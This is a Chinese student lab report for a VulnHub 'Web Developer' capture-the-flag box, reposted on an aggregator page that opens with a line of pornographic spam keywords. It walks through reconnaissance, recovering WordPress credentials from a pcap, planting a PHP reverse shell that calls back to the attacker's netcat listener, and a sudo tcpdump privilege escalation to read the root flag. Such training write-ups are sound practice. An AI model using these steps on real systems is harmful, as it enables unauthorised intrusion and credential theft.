日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

网络渗透测试实验四

發(fā)布時間:2023/12/14 编程问答 26 豆豆
生活随笔 收集整理的這篇文章主要介紹了 网络渗透测试实验四 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

網(wǎng)絡滲透測試實驗報告

  • 實驗目的
  • 通過對目標靶機的滲透過程,了解CTF競賽模式,理解CTF涵蓋的知識范圍,如MISC、PPC、WEB等,通過實踐,加強團隊協(xié)作能力,掌握初步CTF實戰(zhàn)能力及信息收集能力。熟悉網(wǎng)絡掃描、探測HTTP web服務、目錄枚舉、提權(quán)、圖像信息提取、密碼破解等相關工具的使用,系統(tǒng)環(huán)境:Kali Linux 2、WebDeveloper靶機來源:https://www.vulnhub.com/

    實驗工具:不限

  • 實驗內(nèi)容、原理
  • 目的:獲取靶機Web Developer 文件/root/flag.txt中flag。

    基本思路:本網(wǎng)段IP地址存活掃描(netdiscover);網(wǎng)絡掃描(Nmap);瀏覽HTTP 服務;網(wǎng)站目錄枚舉(Dirb);發(fā)現(xiàn)數(shù)據(jù)包文件 “cap”;分析 “cap” 文件,找到網(wǎng)站管理后臺賬號密碼;插件利用(有漏洞);利用漏洞獲得服務器賬號密碼;SSH 遠程登錄服務器;tcpdump另類應用。

  • 實驗過程
  • 發(fā)現(xiàn)目標 (netdiscover),找到WebDeveloper的IP地址。截圖。
  • ?2.:利用NMAP掃描目標主機,發(fā)現(xiàn)目標主機端口開放、服務情況,截圖并說明目標提供的服務有哪些?(利用第一次實驗知識點)

    ?

    目標主機提供了ssh服務和http服務;

  • 若目標主機提供了HTTP服務,嘗試利用瀏覽器訪問目標網(wǎng)站。截圖。是否有可用信息?
  • 在虛擬機瀏覽器中打開掃描到的目標主機的IP地址,看到如下界面

    Login in登錄后臺;

    4.利用whatweb探測目標網(wǎng)站使用的CMS模板。截圖。分析使用的CMS是什么?

    輸入whatweb -v 192.168.127.130(目標主機ip),得如下命令

    分析到使用的CMS(內(nèi)容管理系統(tǒng))是WordPress site

  • 網(wǎng)絡搜索wpscan,簡要說明其功能
  • WPScan是Kali Linux默認自帶的一款漏洞掃描工具,它采用Ruby編寫,能夠掃描WordPress網(wǎng)站中的多種安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主題漏洞。最新版本W(wǎng)PScan的數(shù)據(jù)庫中包含超過18000種插件漏洞和2600種主題漏洞,并且支持最新版本的WordPress。值得注意的是,它不僅能夠掃描類似robots.txt這樣的敏感文件,而且還能夠檢測當前已啟用的插件和其他功能。

    WordPress是全球流行的博客網(wǎng)站,全球有上百萬人使用它來搭建博客。他使用PHP腳本和Mysql數(shù)據(jù)庫來搭建網(wǎng)站。

  • 使用 Dirb 爆破網(wǎng)站目錄。(Dirb 是一個專門用于爆破目錄的工具,在 Kali 中默認已經(jīng)安裝,類似工具還有國外的patator,dirsearch,DirBuster, 國內(nèi)的御劍)截圖。找到一個似乎和網(wǎng)絡流量有關的目錄(路徑)。
  • 在kali輸入dirb http://192.168.127.130?爆破目錄網(wǎng)站,找到DIRECTORY:http://192.168.127.130/ipdata/

  • 瀏覽器訪問該目錄(路徑),發(fā)現(xiàn)一個cap文件。截圖。?
  • 發(fā)現(xiàn)cap文件并下載;

  • 利用Wireshark分析該數(shù)據(jù)包,分析TCP數(shù)據(jù)流。找到什么有用的信息?截圖。
  • 把cap文件扔到wireshark分析抓包數(shù)據(jù),輸入http.request.method==POST過濾,找到想要抓包的數(shù)據(jù)

    發(fā)現(xiàn)了目標主機網(wǎng)站的賬戶和密碼;

    復制登錄http://192.168.127.130網(wǎng)站后臺;

    在瀏覽器中搜索http://pentestmonkey.net/tools/web-shells/php-reverse-shell

    點擊download,下載,并打開,復制其中的代碼;

    在后臺中找到任意一個PHP頁面,利用剛剛復制到的代碼復制粘貼其中,修改代碼中反彈目標的IP地址“192.168.127.133”及端口“4444”

    接下來,在kali中打開,輸入命令nc ?-lvp ?4444,利用NC開始監(jiān)聽,并打開瀏覽器訪問修改的PHP頁面,從而得到反彈shell(用戶www-data)。建立會話后,輸入cat/var/www/html/wp-config.php

    查看wp-config.php獲得賬號及口令。

    緊接著輸入

    輸入命令ssh webdeveloper@192.168.127.133 (ssh ?用戶名@目標主機IP)

    繼續(xù)輸入password;發(fā)現(xiàn)可以root權(quán)限執(zhí)行tcpdump命令,輸入下面的幾個命令

    創(chuàng)建攻擊文件

    touch /tmp/exploit1

    寫入shellcode

    echo 'cat /root/flag.txt' > /tmp/exploit

    賦予可執(zhí)行權(quán)限

    chmod +x /tmp/exploit

    利用tcpdump執(zhí)行任意命令

    sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root

    找到flag;

    實驗完成。

  • 實驗小結(jié)
  • 本次實驗我的收獲很大,學會了如何利用插件漏洞,用wireshake打開目標主機網(wǎng)站的數(shù)據(jù)庫文件并抓包,找到該網(wǎng)站管理后臺的用戶名和密碼,用枚舉dirb爆破網(wǎng)站目錄,獲得服務器的賬號密碼,讓它代替我們執(zhí)行一些命令,但是在實驗的過程中,對一些命令以及一些專業(yè)術(shù)語不太了解,還需要進一步查資料,記錄下來。

    總結(jié)

    以上是生活随笔為你收集整理的网络渗透测试实验四的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。